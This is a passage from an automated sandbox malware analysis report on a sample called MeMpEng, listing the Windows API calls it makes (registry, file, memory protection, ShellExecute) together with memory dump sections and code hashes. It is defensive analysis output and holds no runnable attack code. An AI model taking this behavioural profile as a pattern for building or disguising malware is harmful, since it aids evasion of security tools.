                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                                          • Instruction ID: d8afcb7e31c577c7df5a47bf7b189458025ebbcb83da75e60b69e678f76aa364
                                                          • Opcode Fuzzy Hash: 874a48f5052de35ce3f5d68bebafa1d1d6b4bc0d038a260f4494356ae22f2f83
                                                          • Instruction Fuzzy Hash: E8E06D71904104AADB00EFA5AE498AE77B9EB80349B20443FF101B00E9C67859109A3D
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32 ref: 0040240E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                                          • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                          • Opcode Fuzzy Hash: 05d014058449bd4b547e5342c092477e81e00b6c136499da1acfa5e54e0b5503
                                                          • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          • Opcode ID: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                                          • Instruction ID: 5ef6c9dc075d7657941f8fe9075485116ee4ddb5350d9d3ef67c2e6f18a0d880
                                                          • Opcode Fuzzy Hash: 90ae4191cc2eee50ed17e5dc204d1be3e337bf975627a90f163dd72e6c21e694
                                                          • Instruction Fuzzy Hash: 6FE04871204101AAE700DB94DD49EAF7768DF50358F20813BE511A60D1E6B49914972D
                                                          APIs
                                                          • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406418
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction ID: 1ec48b264e911f442ad562827ea2aeba8bdc9c692846981259ff7ce92a87d17c
                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction Fuzzy Hash: 60E0BF72110109BFEF095F90DD0AD7B761DE704210B01452EF906D4051E6B5A9305674
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060DB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                          • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 0040610A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                          • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(729F505C,00000004,00000040,729F504C), ref: 729F2A9D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 2dc0ec652d80586fd1dac768138db8481181d3e1968ba0a9d1694b7c58909456
                                                          • Instruction ID: 9951479b5545ab06b4bd7f25125b5f9bfae9ff24b22abe76bf4c9904b7736b18
                                                          • Opcode Fuzzy Hash: 2dc0ec652d80586fd1dac768138db8481181d3e1968ba0a9d1694b7c58909456
                                                          • Instruction Fuzzy Hash: 95F07FB2988281FED3D1CF2A8444B293BE0A748204F3D493EA38CD6A80E33446448B96
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                                          • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                          • Opcode Fuzzy Hash: af8866ea374093282caf300f4873787412238c1fbfbe0191187a71e12ad24201
                                                          • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                          • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                                          • Instruction ID: 2b9d1094eaa3a8f74ec8242088029bd2eb80cc7fbaada08ad61a8f4613916ca8
                                                          • Opcode Fuzzy Hash: 9d343ac4382d2e8cff30bc3796d860aaf3667ae62c4bad401f9ffbe6388ce1d7
                                                          • Instruction Fuzzy Hash: 8BD05B72B08101D7DB00DBE89B48A9E77609B50368B30C53BD111F11E4D6B8C555A71D
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                          • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                                          • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                          • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 00405B89
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                          • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                          • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                          • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                                          • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                          • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
